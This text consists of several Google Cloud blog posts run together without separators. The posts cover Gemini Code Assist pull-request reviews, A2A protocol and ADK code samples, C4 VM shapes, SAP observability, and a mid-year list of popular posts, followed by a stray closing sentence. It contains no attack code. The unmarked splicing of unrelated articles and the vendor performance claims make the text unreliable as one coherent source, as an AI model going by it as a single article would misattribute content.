Imagine a code review process that doesn’t slow you down. Instead of a queue of pending pull requests, you have an intelligent assistant that provides a near-instant, comprehensive summary of every change. It flags potential bugs, suggests improvements based on best practices, and frees up your human reviewers to focus on the complex architectural decisions that truly require their expertise.
This isn’t a future-state prediction; it’s what’s possible today with Gemini Code Assist, integrated directly into your GitHub workflow at no charge. By embedding a powerful AI partner into every pull request, we’re transforming code reviews from a frustrating bottleneck into a fast, painless path to consistent, high-quality code and happier developers.
The challenge: Why code reviews are a bottleneck
Code reviews are a non-negotiable part of building quality software, but they are often a major bottleneck in the development lifecycle. This friction slows down delivery velocity, leads to inconsistent code quality, and makes it difficult to enforce best practices. Research from DORA’s Impact of Generative AI in Software Development report advises that organizations “Double-down on fast high-quality feedback, like code reviews and automated testing, using gen AI as appropriate.” DORA research has found that teams with shorter code review times have 50% better software delivery performance.1 AI adoption has been shown to increase code review speed by an estimated 3.1% for every 25% increase in AI adoption, and to improve reported code quality by 3.4%.2
The solution: An AI-powered partner in your PRs
Gemini Code Assist integrates into your GitHub workflow as an intelligent partner, conducting code reviews to solve these challenges. When a pull request is created, Gemini is automatically assigned as a reviewer and gets to work immediately. Here’s how it helps:
Near-instant PR summaries: Provides a comprehensive summary of the changes to help human reviewers get up to speed almost instantly.
In-depth automated reviews: Identifies stylistic issues, deviations from best practices, and potential bugs, freeing human reviewers to focus on more critical issues.
Interactive assistance and learning: Allows anyone in the PR to have a conversation with the AI using /gemini commands to ask for alternative implementations or get a fresh review, as in the examples below.
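For example, commenting `/gemini summary` on a pull request regenerates the summary, `/gemini review` requests a fresh, full review of the latest changes, and `/gemini help` lists the commands the app supports. These commands come from the app’s documentation, so check the current docs for the complete list.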
The power of Gemini 2.5: A leap in code review intelligence
With our recent general availability release, Gemini Code Assist has been upgraded to run on our latest model, Gemini 2.5. This isn’t just an incremental update—it’s a major leap forward in the quality, accuracy, and intelligence of AI-powered code reviews.
What does this mean for your daily pull requests?
Deeper insights: You’ll see more insightful suggestions that go beyond simple style fixes. Gemini 2.5 is better at understanding the logic and intent behind your code, helping to identify potential bugs and suggest more efficient implementations.
More actionable code suggestions: Through customer-specific style guides and configurations, the AI-generated code is now more accurate and context-aware. You’ll find that suggestions are often so reliable that you can commit them with confidence after a quick review, speeding up your iteration cycles.
Improved relevance: We have significantly increased the relevance and accuracy of suggestions. This means you can trust the feedback you receive, spend less time second-guessing the AI, and spend more time moving your project forward.
These improvements are a direct result of our rigorous internal testing and deliver more comprehensive and actionable feedback to help developers be more productive.
Customer story: How Delivery Hero enhances code quality with Gemini Code Assist
Delivery Hero is the world’s leading local delivery platform, operating in around 70 countries. Strengthening the code review process is a key part of their commitment to delivering high-quality, reliable features for their customers, which prompted them to become an early adopter of the Gemini Code Assist GitHub app. The initial feedback from their developers was overwhelmingly positive, and the app’s recent upgrade to the Gemini 2.5 model brought an even more significant impact to the app development process, particularly on code quality. Their engineers found the AI-generated comments to be highly relevant and valuable, directly contributing to a higher standard of code. The latest developer experience survey after the adoption of the Gemini Code Assist GitHub app showed a clear rise in developer satisfaction with the quality and speed of code reviews, marking a positive turn for this important metric.
“By integrating the Gemini Code Assist GitHub app into our workflow, we are not just adopting a tool; we are fostering a more robust, efficient, and collaborative engineering culture. Our close partnership with Google as an early adopter, built on an agile and effective feedback loop, has been a key part of this success.” – N. Mert Aydin, Principal Software Engineer, Delivery Hero
Get started
Try it today: Get started with Gemini Code Assist on the GitHub Marketplace.
Learn more: Dive deeper by reading the official documentation.
AI is evolving beyond single, task-specific agents into an interconnected ecosystem, where autonomous agents collaborate to solve complex problems, regardless of their underlying platform. To make this transition easier for developers, we are announcing a comprehensive suite of tools that will empower developers to build, deploy, evaluate, and sell Agent2Agent (A2A) agents with Google Cloud.
Today, we’re excited to announce the release of version 0.3 of the A2A protocol, which brings a more stable interface to build against and is critical to accelerating enterprise adoption. This version introduces several key capabilities, including gRPC support, the ability to sign security cards, and extended client-side support in the Python SDK, which together provide more flexible usage, better security, and easier integration.
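To give a flavor of that client-side support, here is a minimal sketch using the open-source Python SDK (`pip install a2a-sdk`). Class and field names follow recent SDK releases and may shift as the protocol evolves, so treat the snippet as illustrative rather than canonical:

```python
# Minimal A2A client sketch (assumes an A2A server running on localhost:9999).
import asyncio
from uuid import uuid4

import httpx
from a2a.client import A2ACardResolver, A2AClient
from a2a.types import MessageSendParams, SendMessageRequest


async def main() -> None:
    async with httpx.AsyncClient() as http:
        # Discover the remote agent through its published Agent Card.
        resolver = A2ACardResolver(httpx_client=http, base_url="http://localhost:9999")
        card = await resolver.get_agent_card()

        client = A2AClient(httpx_client=http, agent_card=card)

        # Send one user message and print the JSON-RPC response.
        request = SendMessageRequest(
            id=str(uuid4()),
            params=MessageSendParams(
                message={
                    "role": "user",
                    "parts": [{"kind": "text", "text": "Hello over A2A!"}],
                    "messageId": uuid4().hex,
                }
            ),
        )
        response = await client.send_message(request)
        print(response.model_dump_json(indent=2, exclude_none=True))


asyncio.run(main())
```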
The A2A protocol is quickly gaining momentum, with support from a growing ecosystem of over 150 organizations that spans every major hyperscaler, leading technology providers, and multinational customers using Google Cloud. Businesses are already building powerful capabilities for their organizations. For example, Tyson Foods and Gordon Food Service are pioneering collaborative A2A systems to drive sales and reduce supply chain friction, creating a real-time channel for their agents to share product data and leads that enhance the food supply chain.
Build: Native support for A2A in the Agent Development Kit (ADK)
We’re releasing native support for A2A in Agent Development Kit (ADK), a powerful open-source agent framework released by Google. Built on our previously released A2A SDKs, this makes it easy to create A2A agents if you are already using ADK. With a simple “Hello, World!”-style code snippet, developers can now use ADK to:
Use an A2A agent with an Agent Card and use it as a sub-agent.
Expose an existing ADK agent to make it discoverable as an A2A agent.
Developers can start building collaborative agents with ADK today; a minimal sketch of both directions follows.
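The sketch below assumes the `google-adk` Python package with its A2A extra (`pip install "google-adk[a2a]"`). Module paths and helper names reflect recent adk-python releases and may differ in yours:

```python
# Minimal sketch of ADK's native A2A support; names are illustrative.
from google.adk.agents import Agent
from google.adk.agents.remote_a2a_agent import RemoteA2aAgent
from google.adk.a2a.utils.agent_to_a2a import to_a2a

# 1) Consume a remote A2A agent (discovered via its Agent Card) as a sub-agent.
remote_greeter = RemoteA2aAgent(
    name="remote_greeter",
    description="A greeting agent served elsewhere over A2A.",
    agent_card="http://localhost:8001/.well-known/agent.json",  # card path may vary by spec version
)

coordinator = Agent(
    name="coordinator",
    model="gemini-2.5-flash",
    instruction="Delegate any greeting request to the remote greeter.",
    sub_agents=[remote_greeter],
)

# 2) Expose an ordinary ADK agent as an A2A server so other agents can
#    discover and call it, e.g. run with: uvicorn my_module:a2a_app --port 8001
a2a_app = to_a2a(coordinator, port=8001)
```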
Deploy: Flexible deployment options with Agent Engine, Cloud Run, and GKE
Once agents are built, they need a robust and scalable home. We are providing three powerful deployment paths for customers to scale agents into production:
Deploy to Agent Engine: For a managed, agent-optimized environment, Agent Engine is the choice for many agent builders. We’re adding support for A2A to Agent Engine in the coming weeks so that you can easily deploy an agent written in any framework to Agent Engine and get a production-ready, Google-scale A2A agent.
Deploy to Cloud Run: For increased flexibility, you can containerize and deploy your A2A agents to Cloud Run, leveraging Google’s serverless infrastructure for massive scale and reliability. Follow the published guide.
Deploy to Google Kubernetes Engine (GKE): For maximum control, you can deploy agents to GKE, providing the full power of Kubernetes to manage A2A systems at scale.
With support for A2A arriving in the coming weeks, developers will be able to use the `agent-starter-pack` CLI tool to complete CI/CD setup in just one line: `uvx agent-starter-pack create my-agent -a adk@gemini-fullstack`
Integrate: Bring your A2A agents to users with Agentspace
Agents need safe and accessible environments to be useful. That’s why we built Agentspace, the destination where agents meet end users. In the coming weeks, partners will be able to make any A2A agent available in Agentspace, transforming it from a standalone tool into a valuable service that people can consume. This includes agents built on partner platforms, giving customers the flexibility to access these A2A agents in multiple locations.
More than just a hub, Agentspace provides the critical governance, safety, and control features needed for an enterprise-ready agent platform, ensuring that interactions are secure and reliable.
Evaluate and commercialize your A2A systems
Building and deploying agents is just the beginning. To create truly enterprise-grade systems, you need robust evaluation capabilities, which is why we’re extending the Vertex GenAI Evaluation Service to support A2A agent evaluations. See our hands-on guidance.
Discover and sell partner-built A2A agents in AI Agent Marketplace
Partners can now sell their A2A agents directly to customers in the AI Agent Marketplace. This will allow Google Cloud customers to discover and purchase agents published by ISVs, GSIs, and other technology providers. The AI Agent Marketplace provides an important path to market for partners looking to monetize their AI Agents.
We announced the A2A protocol in April to lead the industry toward interoperable agent systems, and in June, we advanced that commitment by contributing it to the Linux Foundation. The industry’s response continues to grow, reflecting a shared belief in vendor-neutral, community-driven standards. Many of Google Cloud’s partners have previously offered agents to joint customers, and they are now enabling these agents with A2A to help future-proof investments for customers.
Adobe: A leader in generative AI, Adobe is leveraging the A2A protocol to make its rapidly-growing number of distributed agents interoperable with agents in Google Cloud’s ecosystem. The A2A protocol enables Adobe agents to collaborate in the enterprise to create powerful new digital experiences, streamline workflows that optimize the content creation process, and automate multi-system processes and data integrations.
S&P Global Market Intelligence: S&P, a provider of information services and solutions to global markets, has adopted A2A as a protocol for inter-agent communication. This strategic alignment enhances interoperability, scalability, and future-readiness across the organization’s agent ecosystem.
ServiceNow: As a founding partner of A2A, ServiceNow empowers customers with its AI Agent Fabric, a multi-agent communication layer that connects ServiceNow, customer, and partner-built agents. This provides enterprises with the greater choice and flexibility needed to unlock the full potential of agentic AI, resulting in faster decisions, fewer handoffs, and more scalable solutions.
Twilio: Twilio is using the A2A protocol to implement latency-aware agent selection. By extending the A2A protocol, individual agents now broadcast their latency, enabling the system to intelligently route tasks to the most responsive agent available and to adapt gracefully – for example, playing a filler prompt or adding typing sounds if a high-latency agent is the only option.
Developers can read more about past releases in the release notes, learn about what’s coming in our roadmap, and join the community to help evolve the protocol. The community has also released great tooling around A2A, including the A2A Inspector and the Technology Compatibility Kit.
Get started
We’re excited to partner across the industry to build the future of artificial intelligence. Explore the resources above to start building today.
We’re thrilled to announce a significant expansion of our C4 virtual machine series, with the general availability of 28 powerful new shapes. This expansion introduces C4 shapes with Google’s next-gen Titanium Local SSD, C4 bare metal instances, and new extra-large shapes, all powered by the latest Intel Xeon 6 processors, Granite Rapids. We’re excited to be the first leading hyperscaler to bring Xeon 6 to customers.
C4 VMs with Xeon 6 deliver performance gains of up to 30% for general compute and up to 60% for ML recommendation workloads, and up to 35% lower access latency on Titanium Local SSD shapes. If you already use the C4 machine series, this means an easy and powerful path to the latest hardware without needing to migrate to a new machine series. You can take advantage of your existing committed use discounts (CUDs) and enjoy capabilities like managed instance groups and Google Kubernetes Engine (GKE) custom compute classes.
C4 VMs on Intel Xeon 6
Initially launched with Intel 5th generation Xeon processors (Emerald Rapids), C4 VMs provided advancements in performance and control for enterprise and mission-critical workloads, especially AI, gaming, databases, and data analytics. Now with Xeon 6 (Granite Rapids), C4 VMs power even more demanding workloads, delivering the highest frequency of any Google Compute Engine VM (up to 4.2 GHz), the most vCPUs and RAM of any comparable Intel-based product, a larger L3 cache, and 1.35x higher maximum memory bandwidth. The C4 machine series also offers enhanced maintenance controls with a 30-day uptime window between planned maintenance events, and scalable Hyperdisk storage with up to 500k IOPS and 10 GB/s of throughput, including features like Hyperdisk Storage Pools.
Inference workloads on C4 with Xeon 6 demonstrate up to 60% better performance per core compared to the prior-generation C3. C4’s new shapes support FP16-trained models with Intel AMX-FP16, making it a great choice for accelerating machine learning inference. Also, new larger half- and full-host C4 shapes (144 and 288 vCPUs) guarantee memory isolation for highly predictable performance. The largest C4 shape enables up to 30% more performance per core on the estimated SPECrate®2017_int_base benchmark versus C3.
“SAS® Viya®, our cloud-based data and AI platform, is optimized for productivity with Intel hardware. We’re eager to scale production on C4 with Granite Rapids, having measured up to 20% performance improvement in areas such as deep learning and synthetic data generation. C4 with Granite Rapids leveraging Intel AMX delivers up to 6x speed-up, achieving GPU-comparable performance for a wide range of generative AI use cases involving inference with small to mid-size models. This empowers customers to use SAS Viya in Google Cloud in a more cost-effective way.” – Craig Rubendall, Vice President, Applied Architecture and Technology, SAS
“As a next-generation visual effects studio, beloFX demands peak performance for complex renders. When testing C4 on Granite Rapids, we observed an impressive 50% speedup against our n2d-standard-128 and n2-standard-128 nodes. This significant boost lets us produce more groundbreaking visual effects, faster, truly supercharging our ability to innovate.” – Christoph Ammann, Global Technology Supervisor, beloFX
New C4 standard, highmem, and highcpu shapes with 144 and 288 vCPUs are powered exclusively by Xeon 6:
| highcpu | standard | highmem |
| --- | --- | --- |
| C4-highcpu-144 | C4-standard-144 | C4-highmem-144 |
| C4-highcpu-288 | C4-standard-288 | C4-highmem-288 |
Turbocharge your storage with Titanium Local SSD
We’re also excited to announce Local SSD support for C4 VMs, available with new -lssd machine types, exclusively on Xeon 6 processors. These new local SSD shapes leverage the latest Titanium SSDs, delivering impressive I/O performance for workloads like high-performance databases (e.g., Cassandra, MongoDB, SQL Server tempDB and pagefile workloads), big data processing (e.g., Spark, Hadoop), media rendering and transcoding, and caching layers.
C4-lssd offers up to 7.2M max read IOPS, more than three times higher than comparable options from other leading hyperscalers. This translates to dramatic improvements in read/write latency. Titanium SSDs on C4 enable up to 35% lower access latency compared to previous-generation SSDs.
“For financial market infrastructure, every microsecond of latency matters. With C4-LSSD, we have seen an impressive 70% improvement in write latency compared to previous generations. This reduction with Titanium SSDs on C4 is crucial for our demanding, high-throughput applications, ensuring the stability and responsiveness essential for our business.” – Christian Hellmann, DevOps Engineer, Deutsche Börse Group
C4 with Local SSD is available in standard and highmem configurations starting from 4 vCPUs, exclusively on Xeon 6:
| Machine type (standard) | Machine type (highmem) | Local SSD capacity (GiB) |
| --- | --- | --- |
| C4-standard-4-lssd | C4-highmem-4-lssd | 375 |
| C4-standard-8-lssd | C4-highmem-8-lssd | 375 |
| C4-standard-16-lssd | C4-highmem-16-lssd | 750 |
| C4-standard-24-lssd | C4-highmem-24-lssd | 1,500 |
| C4-standard-32-lssd | C4-highmem-32-lssd | 1,875 |
| C4-standard-48-lssd | C4-highmem-48-lssd | 3,000 |
| C4-standard-96-lssd | C4-highmem-96-lssd | 6,000 |
| C4-standard-144-lssd | C4-highmem-144-lssd | 9,000 |
| C4-standard-192-lssd | C4-highmem-192-lssd | 12,000 |
| C4-standard-288-lssd | C4-highmem-288-lssd | 18,000 |
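As a hedged sketch of how you might provision one of these shapes programmatically, the snippet below uses the google-cloud-compute Python client; the project, zone, and image values are placeholders, and the Hyperdisk boot disk reflects C4’s storage pairing described above:

```python
# Hedged sketch: provisioning a C4 Titanium Local SSD shape with the
# google-cloud-compute client (`pip install google-cloud-compute`).
# Project, zone, and image values are placeholders.
from google.cloud import compute_v1

project, zone = "my-project", "us-central1-a"  # assumption: a zone offering C4 on Xeon 6

instance = compute_v1.Instance(
    name="c4-lssd-demo",
    # The Titanium Local SSD capacity is bundled with the -lssd shape (see table above).
    machine_type=f"zones/{zone}/machineTypes/c4-standard-16-lssd",
    disks=[
        compute_v1.AttachedDisk(
            boot=True,
            auto_delete=True,
            initialize_params=compute_v1.AttachedDiskInitializeParams(
                source_image="projects/debian-cloud/global/images/family/debian-12",
                # C4 pairs with Hyperdisk for durable storage.
                disk_type=f"zones/{zone}/diskTypes/hyperdisk-balanced",
            ),
        )
    ],
    network_interfaces=[compute_v1.NetworkInterface(network="global/networks/default")],
)

operation = compute_v1.InstancesClient().insert(
    project=project, zone=zone, instance_resource=instance
)
operation.result()  # block until the VM is created
```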
Unlock direct access with C4 bare metal shapes
For workloads that demand direct access to CPU and memory resources, we’re introducing C4 bare metal shapes. These instances are ideal for commercial and custom hypervisors, applications not traditionally supported in virtual machines, and those with special performance monitoring or licensing requirements. C4 bare metal is SAP-certified, delivering an impressive 132,600 SAPS — the highest of any comparable machine — providing peak performance and compliance for your critical SAP application servers.
Customers in financial services and SaaS/PaaS security, and those running dev/test environments or private cloud platforms, will find C4 bare metal types essential for meeting their stringent performance goals. Compared to the previous-generation C3 bare metal instances, C4 bare metal offers up to a 35% performance improvement.
New C4 bare metal instances are available in standard-metal and highmem-metal, powered exclusively by Xeon 6:
| standard | highmem |
| --- | --- |
| C4-standard-288-metal | C4-highmem-288-metal |
Get started with C4 on Intel Xeon 6 today
The expanded C4 machine series with Intel Xeon 6 is available today in 19 zones, with more expansion to come. Check the latest regional availability on our regions and zones page. Experience the leading performance, predictability, and control that C4 VMs deliver today! To learn more about C4 and its new capabilities, visit the C4 documentation.
“Intel and Google Cloud are shaping the future of cloud computing with the expansion of the C4 machine series powered by Intel Xeon 6 processors. With enhanced performance, built-in AI acceleration, and greater deployment flexibility with new extra-large shapes, we’re enabling customers to innovate faster and run workloads more efficiently than ever before.” – Ronak Singhal, Intel Senior Fellow, Intel
Managing complex SAP landscapes can feel like navigating a maze. You’re juggling application performance, database health, infrastructure stability, and more, all while striving to keep business applications running seamlessly. Today, we’re excited to announce new observability and monitoring functionality in Workload Manager that provides SAP customers with purpose-built tools to bridge gaps in data and deliver a unified view of SAP environments across all layers of their cloud environments.
Workload Manager is not intended to replace your existing SAP monitoring tools, but rather complement them by providing a broader view of your SAP systems and enabling you to more easily correlate application-level insights with infrastructure performance and events.
Expanding visibility in complex SAP environments
Traditional SAP monitoring excels at providing detailed information at the application and database level. Metrics about transaction performance, user activity, and application logs are readily available. However, understanding the relationship between this application data and the underlying infrastructure can sometimes require additional effort. For example, a slowdown in transaction processing might be due to a database issue, a network bottleneck, or even a problem with the underlying virtual machine. While existing tools provide valuable insights, correlating application performance with infrastructure health can be a time-consuming process or may require toggling between different monitoring platforms and manual efforts.
Creating a system-centric, unified view with Workload Manager
After enabling the necessary functionality in Google Cloud’s Agent for SAP, you can navigate to the main Observability dashboard to see an overview of your SAP systems and the overall health status of each system and sub-layer. The health status is calculated using a variety of metrics from SAP Netweaver instances, SAP HANA databases, pacemaker clusters, and the availability of the underlying infrastructure hosting them.
Clicking on a system will take you to the system Overview page, where you can visualize the components of the system and see the current health status for each instance included. The Health Insights table will summarize any health issues that are currently detected, and the Maintenance Events table displays any upcoming maintenance for supported machine types.
The “Applications” and “Databases” tabs behave similarly, and help you correlate key performance indicators from your SAP applications with metrics from your VMs, storage, network, and other Google Cloud services such as the following:
Availability: GCE Instance Availability, SAP NetWeaver and SAP HANA instance status, SAP NetWeaver and SAP HANA process status and Pacemaker Cluster nodes and resource status.
Performance: GCE Instance CPU and memory utilization, operating system processes by CPU and memory and information about swap I/O operations on the operating system.
Storage: SAP related file systems usage, disk space utilization and usage, disk throughput and disk IOPS.
Networking: Information about network traffic and network packages.
NetWeaver: CPU and memory utilization by SAP NetWeaver process, response time by process in the SAP NetWeaver instance, SAP NetWeaver sessions and RFC connections by type, SAP NetWeaver process utilization per work process type, and information for each SAP NetWeaver process type’s respective queue in the system.
HANA: SAP HANA System Replication status, SAP HANA System Replication latency, memory usage in the SAP HANA Database by type, information about idle and running connections in the SAP HANA database and top schemas by record count in the SAP HANA database.
Backups: Information related to Backint backups including Backup/Recovery success rate, Backup/Recovery average MBps for all operations and historical data about both Backup/Recovery status and throughput.
New Event Annotations built specifically for SAP allow you to surface system events directly on monitoring dashboards to help empower you to quickly identify the root cause or see the impact of events on your system’s performance and health. These events are also now available outside of Workload Manager in Cloud Monitoring dashboards.
SAP Availability:
Pacemaker cluster:
Pacemaker cluster node status
Pacemaker cluster resource status
SAP HANA Database:
SAP HANA instance status
SAP HANA service status
SAP NetWeaver:
SAP NetWeaver instance status
SAP NetWeaver service status
SAP Operations:
SAP HANA System Replication status
SAP HANA Backup status
SAP HANA Data backups
SAP HANA Log backups
For example, in the following screenshot we can see how a SAP HANA database failover impacted the database availability and see the series of events as the Pacemaker cluster moved the database operations to the secondary node.
Other key features and benefits:
Comprehensive metrics: The solution collects a wide range of metrics from your SAP applications and Google Cloud infrastructure, but if you are looking for more, you can create your own custom queries and add the metrics to your custom dashboards inside Workload Manager Observability.
Customizable dashboards: Modify the dashboards to create alternative views, helping you visualize what matters most to your business and identify critical issues faster.
Alerting and notifications: The dashboards are natively integrated with Cloud Monitoring and alerting. You can set up alerts for specific metrics and receive notifications when thresholds are breached, as in the sketch after this list.
Automated system discovery: The Agent for SAP automatically identifies and reconciles your SAP instances and resources when enabled, saving you valuable time and avoiding manual tagging or labeling.
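For example, here is a hedged sketch of creating a threshold alert on an Agent for SAP metric with the Cloud Monitoring Python client. The exact metric type shown is an assumption; look up the real names in the Workload Manager metrics documentation:

```python
# Hedged sketch: a threshold alert on an Agent for SAP metric using the
# Cloud Monitoring client (`pip install google-cloud-monitoring`). The metric
# type below is an assumption; check the Workload Manager metrics list.
from google.cloud import monitoring_v3
from google.protobuf import duration_pb2

policy = monitoring_v3.AlertPolicy(
    display_name="SAP HANA replication unhealthy",
    combiner=monitoring_v3.AlertPolicy.ConditionCombinerType.OR,
    conditions=[
        monitoring_v3.AlertPolicy.Condition(
            display_name="HANA HA replication metric below 1 for 5 minutes",
            condition_threshold=monitoring_v3.AlertPolicy.Condition.MetricThreshold(
                filter=(
                    'metric.type = "workload.googleapis.com/sap/hana/ha/replication"'
                    ' AND resource.type = "gce_instance"'
                ),
                comparison=monitoring_v3.ComparisonType.COMPARISON_LT,
                threshold_value=1,
                duration=duration_pb2.Duration(seconds=300),
            ),
        )
    ],
)

client = monitoring_v3.AlertPolicyServiceClient()
created = client.create_alert_policy(
    name="projects/my-project",  # placeholder project
    alert_policy=policy,
)
print("Created alert policy:", created.name)
```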
Getting started
Ready to experience the benefits of a single-pane-of-glass for SAP observability on Google Cloud? You can view detailed documentation and instructions on how to get started and the supported architectures here. The observability service in Workload Manager is available at no additional cost, but the underlying metrics and logs are subject to costs associated with Cloud Monitoring and Cloud Logging. You can view an estimated cost for the required features that must be enabled here.
If you would like assistance onboarding or would like a demo or more information, please contact your account representative or Google Cloud support and we will be in touch.
Looking ahead
We are committed to continuously improving SAP observability on Google Cloud, and plan to add new features, more correlation capabilities, and more insightful visualizations.
Six months into 2025, we’ve already published hundreds of posts here on the Google Cloud blog. We asked ourselves, why wait until the busy end of the year to review your favorites? With everything from new AI models, product launches, emerging cyber threats, company news, certifications and customer stories, here is a mid-year recap that will get you up to speed on the latest from Google Cloud and the rapidly emerging cloud and AI landscape.
25. How Google Does It: Making threat detection high-quality, scalable, and modern
Published January 7, 2025
Google and Alphabet run the largest Linux fleet in the world, with nearly every flavor of operating system available, and see a steady stream of malicious system and network activity. Learn how our threat detection and response team detects, analyzes, and responds to threats on a vast scale.
24. NVIDIA GPUs are now generally available on Cloud Run
More and more organizations are turning to Cloud Run, Google Cloud’s serverless runtime, for its simplicity, flexibility, and scalability. And now, with the general availability of NVIDIA GPUs on the platform, developers can choose Cloud Run for applications that require powerful graphics processing, like machine learning models.
23. BigQuery emerges as autonomous data-to-AI platform
Published April 10, 2025
This is not your grandfather’s data warehouse. BigQuery is now an AI-native, multimodal, and agentic data-to-AI platform. The blog post provides an overview of the many new features and capabilities that went into this new designation, including new data preparation, data analysis, code generation, and management and troubleshooting capabilities.
22. Announcing Gen AI Toolbox for Databases. Get started today
Published February 6, 2025
Tired of building custom plumbing to connect your AI apps to your databases? This article announces the public beta of the Gen AI Toolbox for Databases, an open-source server built with LangChain that provides a secure, scalable, and manageable way to connect your generative AI applications to your data.
21. Ghost in the router: China-nexus espionage actor UNC3886 targets Juniper Networks
Published March 11, 2025
After discovering in 2024 that threat actors deployed custom backdoors to Juniper Networks’ Junos OS routers, Mandiant worked with Juniper to investigate this activity and observed that the affected routers were running end-of-life hardware and software. Learn more about the threat and how to remediate it in your environment.
20. AI Hypercomputer, Google Cloud’s supercomputing system for AI and HPC
It’s a platform, it’s a system, it’s AI Hypercomputer, Google Cloud’s fully managed supercomputing system for running AI and HPC workloads. As discussed at Google Cloud Next 2025, AI Hypercomputer supports all the latest and greatest compute, networking and storage infrastructure, and its software layer helps AI practitioners and engineers move faster with open and popular ML frameworks. Finally, there’s a full suite of workload management and observability tools to help you manage the thing.
19. Ipsos research shows why cloud certification matters — get certified with Google Cloud
Published February 25, 2025
Google Cloud partnered with Ipsos, the global research firm, to study the impact of cloud certifications on career advancement and achievement. For example, 8 out of 10 survey respondents said earning a recognized certificate helped them land a job faster and 75% believe they secured a higher salary through their certification.
18. Connect globally with Cloud WAN for the AI Era
Published April 9, 2025
With 202 points of presence (PoPs), powered by over 2 million miles of fiber, 33 subsea cables, and backed by a 99.99% reliability SLA, Google’s backbone network is, how do we put it? Vast. And with Cloud WAN, enterprises can now use it for their own wide area network (WAN) architectures.
17. Expanding generative media for enterprise on Vertex AI
Published April 9, 2025
At Google Cloud Next 25, we announced powerful new creative controls for our generative media models on Vertex AI. Now you can edit video with in-painting and out-painting, use camera controls for dynamic shots, and even create custom voices for AI-powered narration with as little as 10 seconds of audio.
16. China-nexus espionage actors continue to target edge devices
Threat actors continue to target edge devices globally, leveraging deep device knowledge and using both zero-day and now n-day flaws. This activity aligns with the broader strategy that the Google Threat Intelligence Group has observed among suspected China-nexus espionage groups, who invest significantly in exploits and custom malware for critical edge infrastructure.
15. Defending against UNC3944: Cybercrime hardening guidance from the frontlines
Published May 6, 2025
Who is UNC3944? A financially-motivated threat actor characterized by its persistent use of social engineering and brazen communications with victims. Mandiant provides guidance and strategies for hardening systems and defenses against the cybercrime group, offering practical steps to protect against their specific attack methods.
14. MCP Toolbox for Databases (formerly Gen AI Toolbox for Databases)
Published April 22, 2025
Ready to build AI agents that can actually use your data? This article announces that our MCP Toolbox for Databases now supports the Model Context Protocol (MCP), making it easier than ever to connect your generative AI agents to enterprise data. With new support for the Agent Development Kit (ADK) and LangGraph, you can build powerful, stateful agents with intuitive code and connect them to your databases securely.
13. Formula E’s AI equation: A new Driver Agent for the next era of racing
Published March 25, 2025
As motorsport has grown in popularity, the ability of fans from diverse backgrounds to enter the cockpit has not always kept up. Formula E sought to level the course for aspiring drivers by creating an AI-powered Driver Agent; connected to a Formula E simulator, the agent provides drivers and coaches with real-time feedback on technique and tactics, helping them improve faster than a flying lap.
12. Google Agentspace enables the agent-driven enterprise
Published April 9, 2025
Do you want to search all your company’s information in a few clicks, or generate ideas with built-in agents that already know your company’s style? Google Agentspace now includes a no-code agent designer, a gallery for discovering agents, and two new expert agents for deep research and idea generation, all integrated directly into Chrome.
11. Announcing Veo 3, Imagen 4, and Lyria 2 on Vertex AI
Published May 20, 2025
The next generation of creating for enterprise is here. We expanded Vertex AI to include our most powerful generative AI media models: Imagen 4 for stunningly realistic images with crisp text, Veo 3 for breathtaking video with synchronized audio, and Lyria 2 for composing high-fidelity, original music.
10. How large language models are changing the security landscape
In the security realm, large language models (LLMs) open a world of new possibilities, from sifting through complex telemetry to secure coding, vulnerability discovery, and streamlining operations. However, some of these same AI capabilities are also available to attackers, leading to understandable anxieties about the potential for AI to be misused for malicious purposes.
9. Ivanti Connect Secure VPN targeted in new zero-day exploitation
Published January 8, 2025
Ivanti kicked off the year by disclosing two new vulnerabilities impacting its Ivanti Connect Secure (ICS) VPN appliances. Mandiant identified UNC5221, a suspected China-nexus espionage actor that previously exploited two other Ivanti vulnerabilities as early as December 2023, as the threat actor targeting the new zero-days. Successfully exploiting one of the vulnerabilities could result in downstream compromise of a victim network.
8. Google announces agreement to acquire Wiz
Google Cloud shares a vision with Wiz to improve security by making it easier and faster for organizations of all types and sizes to protect themselves, end-to-end, across all major clouds, and this post announces Google’s agreement to acquire the cloud security startup.
7. Veo 3 available for everyone in preview on Vertex AI
Published June 26, 2025
You dream it, Veo creates it. This post announces Veo 3, our most powerful text-to-video model yet, is now open for everyone to try in public preview on Vertex AI. Create stunning, near-cinematic videos with synchronized sound, and join the next wave of creative storytelling, now available to Google Cloud customers and partners.
6. Vertex AI offers new ways to build and manage multi-agent systems
Published April 9, 2025
This article announces ways to build multi-agentic systems, an evolution of traditional AI agents. To get there, we launched a new suite of tools in Vertex AI to help developers build and deploy them, including an open-source Agent Development Kit (ADK) and a managed Agent Engine. We also introduce the Agent2Agent (A2A) protocol, a new open standard to allow agents built by different companies to communicate and collaborate.
5. Techniques for improving text-to-SQL accuracy and performance
Even though it’s been around for a long time, not all developers speak fluent SQL. English, on the other hand, is pretty well-known. In this technical deep dive for developers working with natural language processing and databases, get the insights and techniques you need to enhance the accuracy and performance of your text-to-SQL conversions.
4. Firebase Studio lets you build full-stack AI apps with Gemini
Published April 9, 2025
For over a decade, developers the world over have relied on Firebase’s backend cloud computing services and application development platforms to power their web applications. And with the new Firebase Studio, they can now use it to develop full-stack AI applications, integrating with the Gemini AI model.
3. Multiple Russia-aligned threat actors targeting Signal Messenger
Published February 19, 2025
As part of the ongoing Russian-Ukrainian conflict, Signal Messenger accounts are of great interest to Russia’s intelligence services for their potential to deliver sensitive government and military communications. Google Threat Intelligence Group has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia’s intelligence services.
2. New Google Cloud certification in generative AI
One of the top questions we hear is, “How do I get ahead?” This isn’t just another certification in a sea of technical qualifications. The Generative AI Leader certification is specifically focused on generative AI, and designed for visionary professionals like you — the managers, administrators, strategic leaders and more who understand that AI’s impact stretches far beyond code.
1. 601 real-world gen AI use cases from the world’s leading organizations
Published April 9, 2025
Since Next 2024, we’ve been gathering examples of how our customers are putting generative AI to use every day across their operations and offerings. We nearly doubled the number of entries for Next 2025, and clearly they’re still resonating, as this has been our most popular story of the year. Which use cases excite you most? Pop over to our LinkedIn page and let us know.
Thank you for being a part of the Google Cloud blog community! We look forward to bringing you many more posts to devour in the second half of the year.
Agentspace provides an Agent Development Kit (ADK) for building specialized agents and an A2A (Agent-to-Agent) communication protocol for agent collaboration. These tools facilitate a shift from static workflows to dynamic, adaptive business systems.
